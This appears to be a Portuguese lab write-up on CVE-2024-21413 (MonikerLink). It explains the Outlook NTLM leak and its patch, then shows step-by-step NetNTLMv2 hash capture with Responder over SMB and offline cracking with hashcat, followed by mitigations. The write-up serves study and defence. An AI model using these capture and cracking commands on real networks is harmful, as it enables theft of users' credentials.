Share
## https://sploitus.com/exploit?id=2C3A5503-A12E-5A08-97CF-13F543BDBB9E
# Laboratório SMB + Responder ([CVE-2024-21413](https://vulners.com/cve/CVE-2024-21413))

## 🎯 Objetivo
Este projeto teve como objetivo estudar a vulnerabilidade **CVE-2024-21413** (*MonikerLink*), explorando como o protocolo **SMB/NTLM** pode ser abusado para captura de credenciais.  
Mesmo após a correção oficial da Microsoft, o laboratório mostra que o conceito continua válido em cenários internos.

---

## 📖 Exploit Theory
A vulnerabilidade CVE-2024-21413 foi classificada como **crítica** (CVSS 9.8).  
Ela permitia que atacantes explorassem o Outlook enviando links `file://` ou `UNC paths` em e-mails.  
Ao clicar, o cliente Outlook tentava autenticar automaticamente via **NTLM**, expondo hashes NetNTLMv2 para o atacante.  

Impactos possíveis:
- **RCE (Remote Code Execution)** em cenários específicos.
- **Exfiltração de credenciais** via SMB relay ou captura offline.

No laboratório, reproduzimos apenas a parte de **captura de hashes NTLM** usando o **Responder**, simulando o vetor interno (SMB), já que o patch bloqueia o vetor externo via Outlook.

---

## 🏗️ Arquitetura do Lab
- **Atacante:** Kali Linux com Responder e Hashcat.
- **Vítima:** Windows com Outlook instalado.
- **Rede:** LAN simulada, sem exposição externa.
- **Ferramentas:**
  - Responder → para envenenamento de protocolos e captura de hashes.
  - Hashcat → para cracking offline dos hashes capturados.

![IPs configurados](IMG/ipconfig.png)  
![Responder ativo](IMG/ResponderAtivo.png)

---

## 🛡️ Patch do Outlook
Durante os testes, o Outlook bloqueou links `file://` vindos de e-mail, exibindo alerta de segurança:

![Alerta Outlook](IMG/AlertaOutlook.png)

### Observação
O patch [KB5002519](https://support.microsoft.com/help/5002519), lançado em fevereiro de 2024, mitiga o vetor externo via e-mail ao bloquear links `file://`.  
No entanto, o protocolo NTLM continua permitindo autenticação automática em conexões SMB.  
Isso significa que, embora o Outlook esteja protegido contra este exploit específico, a superfície de ataque interna permanece válida.  
A raiz da questão está na dependência do NTLM como mecanismo de autenticação, que continua suscetível a captura de hashes em conexões SMB.

---

## 📊 Métricas de risco
- **CVE:** CVE-2024-21413  
- **CVSS:** 9.8 (Crítico)  
- **Impacto:** RCE + vazamento de credenciais  
- **Vetor:** Externo (Outlook) e Interno (SMB/NTLM)  
- **Mitigação recomendada:**
  - Aplicar patch KB5002519.
  - Desabilitar NTLM onde possível.
  - Forçar Kerberos em ambientes AD.
  - Implementar MFA e senhas fortes.

---

## 📚 Aprendizados
1. O patch do Outlook bloqueia apenas o clique em links externos.  
2. O SMB/NTLM continua sendo uma superfície de ataque dentro da rede.  
3. Hashes NetNTLMv2 podem ser capturados e quebrados offline.  
4. Senhas fracas são facilmente descobertas em wordlists comuns.  
5. Mesmo com correção oficial, a vulnerabilidade mantém relevância em cenários internos.  

---

## 📌 Passo-a-passo
1. **Iniciar Responder**  
     Comando no Kali Linux:
```bash
sudo responder -I eth0
```

2. **Forçar comunicação SMB**  
No Windows Explorer, acessar:
```bash
\\\test
```

3. **Captura de hash**  
O Responder gera automaticamente um arquivo no diretório de logs:
```bash
/usr/share/responder/logs/SMB-NTLMv2-SSP-.txt
```

5. **Cracking com Hashcat**  
Executar o comando:

```bash
hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
```
Nota:  
A senha real não é exibida por questões de segurança. O objetivo é demonstrar o processo e a vulnerabilidade.

---

## ✅ Conclusão
Este laboratório evidenciou que:
- O exploit via Outlook foi bloqueado pelo patch.  
- Ainda assim, é possível capturar e quebrar hashes SMB manualmente.  
- A vulnerabilidade continua válida como conceito, reforçando a importância de **hardening interno**, **senhas fortes** e **migração para Kerberos/token-based auth**.